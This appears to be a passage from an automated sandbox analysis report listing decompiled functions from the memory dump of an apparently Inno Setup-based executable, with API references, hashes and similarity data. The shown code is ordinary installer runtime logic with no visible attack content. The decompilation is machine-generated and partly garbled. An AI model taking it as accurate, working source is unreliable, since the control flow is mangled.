                                                                                    • GetTickCount.KERNEL32 ref: 004066D7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                                                    • GetTickCount.KERNEL32 ref: 00406731
                                                                                    • GetTickCount.KERNEL32 ref: 00406768
                                                                                    • GetTickCount.KERNEL32 ref: 00406792
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountTick$CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 3968769311-0
                                                                                    • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                    • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                                                    • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                    • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 80%
                                                                                    			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}


















                                                                                    0x004971ac
                                                                                    0x004971ac
                                                                                    0x004971ac
                                                                                    0x004971ad
                                                                                    0x004971af
                                                                                    0x004971b6
                                                                                    0x004971bb
                                                                                    0x004971bd
                                                                                    0x004971c0
                                                                                    0x004971c0
                                                                                    0x004971c5
                                                                                    0x004971c7
                                                                                    0x004971ca
                                                                                    0x004971ce
                                                                                    0x004971cf
                                                                                    0x004971d4
                                                                                    0x004971d7
                                                                                    0x004971de
                                                                                    0x004971e3
                                                                                    0x004971e9
                                                                                    0x004971ee
                                                                                    0x004971f6
                                                                                    0x004971fa
                                                                                    0x004971fa
                                                                                    0x004971fa
                                                                                    0x004971fc
                                                                                    0x00497203
                                                                                    0x00497284
                                                                                    0x0049728c
                                                                                    0x00497205
                                                                                    0x00497209
                                                                                    0x0049722c
                                                                                    0x0049723e
                                                                                    0x0049720b
                                                                                    0x00497211
                                                                                    0x00497224
                                                                                    0x00497224
                                                                                    0x00497245
                                                                                    0x00497251
                                                                                    0x00497259
                                                                                    0x0049725c
                                                                                    0x00497266
                                                                                    0x00497273
                                                                                    0x00497278
                                                                                    0x00497278
                                                                                    0x00497245
                                                                                    0x00497291
                                                                                    0x00497294
                                                                                    0x00497297
                                                                                    0x004972a4

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                                                      • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                                                    • GetCurrentThread.KERNEL32 ref: 0049727F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Thread$Current$CreateErrorLast
                                                                                    • String ID: 0@G$XtI$l@
                                                                                    • API String ID: 3539746228-385768319
                                                                                    • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                    • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                                                    • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                    • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 36%
                                                                                    			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                                                    0x00406425
                                                                                    0x00406427
                                                                                    0x0040642c
                                                                                    0x00406446
                                                                                    0x004064d9
                                                                                    0x004064d9
                                                                                    0x00000000
                                                                                    0x0040644c
                                                                                    0x0040644c
                                                                                    0x0040644f
                                                                                    0x00406450
                                                                                    0x00406452
                                                                                    0x00406459
                                                                                    0x00000000
                                                                                    0x00406465
                                                                                    0x0040646d
                                                                                    0x00406472
                                                                                    0x00406473
                                                                                    0x00406478
                                                                                    0x0040647b
                                                                                    0x00406481
                                                                                    0x00406485
                                                                                    0x00406486
                                                                                    0x0040648b
                                                                                    0x00406492
                                                                                    0x004064bc
                                                                                    0x004064be
                                                                                    0x004064c1
                                                                                    0x004064c4
                                                                                    0x004064d1
                                                                                    0x00406494
                                                                                    0x00406494
                                                                                    0x004064af
                                                                                    0x004064b2
                                                                                    0x004064ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064ba
                                                                                    0x004064a5
                                                                                    0x004064a8
                                                                                    0x004064e0
                                                                                    0x004064e6
                                                                                    0x004064e6
                                                                                    0x00406492
                                                                                    0x00406459
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                                                    • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                    • API String ID: 4275029093-79381301
                                                                                    • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                    • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                                                    • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                    • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 43%
                                                                                    			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                                                    0x004076c0
                                                                                    0x00407726
                                                                                    0x00407728
                                                                                    0x0040772a
                                                                                    0x0040772f
                                                                                    0x00407734
                                                                                    0x00407736
                                                                                    0x00407736
                                                                                    0x0040773c
                                                                                    0x004076c2
                                                                                    0x004076cb
                                                                                    0x004076db
                                                                                    0x004076db
                                                                                    0x004076f7
                                                                                    0x0040770a
                                                                                    0x0040771e
                                                                                    0x0040771e

                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                    • API String ID: 3320372497-2970929446
                                                                                    • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                    • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                                                    • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                    • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}





                                                                                    0x00420532
                                                                                    0x0042055f
                                                                                    0x00420564
                                                                                    0x00420569
                                                                                    0x00420573
                                                                                    0x00420534
                                                                                    0x00420544
                                                                                    0x00420549
                                                                                    0x0042054e
                                                                                    0x0042054e

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                    • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                                                    • API String ID: 1883125708-3870080525
                                                                                    • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                    • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                                                    • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                    • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                                                    0x0042931c
                                                                                    0x00429328
                                                                                    0x0042932e
                                                                                    0x00429334
                                                                                    0x00429344
                                                                                    0x0042934b
                                                                                    0x0042934b
                                                                                    0x00429356
                                                                                    0x00429364
                                                                                    0x004294ef
                                                                                    0x004294f6
                                                                                    0x004294f7
                                                                                    0x00000000
                                                                                    0x0042936a
                                                                                    0x0042936d
                                                                                    0x0042938b
                                                                                    0x0042936f
                                                                                    0x0042937a
                                                                                    0x0042937a
                                                                                    0x0042939a
                                                                                    0x004293a6
                                                                                    0x004293a9
                                                                                    0x00429416
                                                                                    0x0042941c
                                                                                    0x0042941d
                                                                                    0x00429423
                                                                                    0x00429424
                                                                                    0x00429426
                                                                                    0x0042942b
                                                                                    0x0042942f
                                                                                    0x00429431
                                                                                    0x00429431
                                                                                    0x0042943c
                                                                                    0x00429447
                                                                                    0x00429452
                                                                                    0x0042945b
                                                                                    0x0042945e
                                                                                    0x0042947a
                                                                                    0x00429481
                                                                                    0x0042948c
                                                                                    0x004294a3
                                                                                    0x004294a8
                                                                                    0x004294bc
                                                                                    0x004294c1
                                                                                    0x004294d4
                                                                                    0x004294d4
                                                                                    0x004294dd
                                                                                    0x00429460
                                                                                    0x00429460
                                                                                    0x00429461
                                                                                    0x00429467
                                                                                    0x0042946d
                                                                                    0x0042946f
                                                                                    0x00429471
                                                                                    0x00429474
                                                                                    0x00429477
                                                                                    0x00429477
                                                                                    0x0042947a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0042947a
                                                                                    0x004293ab
                                                                                    0x004293ab
                                                                                    0x004293ac
                                                                                    0x004293ae
                                                                                    0x004293b4
                                                                                    0x004293b6
                                                                                    0x004293c5
                                                                                    0x004293c6
                                                                                    0x004293d0
                                                                                    0x004293d1
                                                                                    0x004293d6
                                                                                    0x004293e1
                                                                                    0x004293e2
                                                                                    0x004293ec
                                                                                    0x004293ed
                                                                                    0x004293f2
                                                                                    0x0042940d
                                                                                    0x0042940f
                                                                                    0x00429410
                                                                                    0x00429413
                                                                                    0x00429413
                                                                                    0x00000000
                                                                                    0x004293b4
                                                                                    0x004293a9

                                                                                    APIs
                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                    • String ID:
                                                                                    • API String ID: 351091851-0
                                                                                    • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                    • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                                                    • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                    • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 34%
                                                                                    			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}










                                                                                    0x004afa44
                                                                                    0x004afa44
                                                                                    0x004afa47
                                                                                    0x004afa49
                                                                                    0x004afa4c
                                                                                    0x004afa50
                                                                                    0x004afa51
                                                                                    0x004afa56
                                                                                    0x004afa59
                                                                                    0x004afa63
                                                                                    0x004afa77
                                                                                    0x004afa65
                                                                                    0x004afa6d
                                                                                    0x004afa6d
                                                                                    0x004afa7c
                                                                                    0x004afa81
                                                                                    0x004afa84
                                                                                    0x004afa85
                                                                                    0x004afa8a
                                                                                    0x004afa97
                                                                                    0x004afaae
                                                                                    0x004afab5
                                                                                    0x004afab8
                                                                                    0x004afabb
                                                                                    0x004afacd

                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                    Strings
                                                                                    • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                                                    • Setup, xrefs: 004AFA9E
                                                                                    • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                                                    • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Message
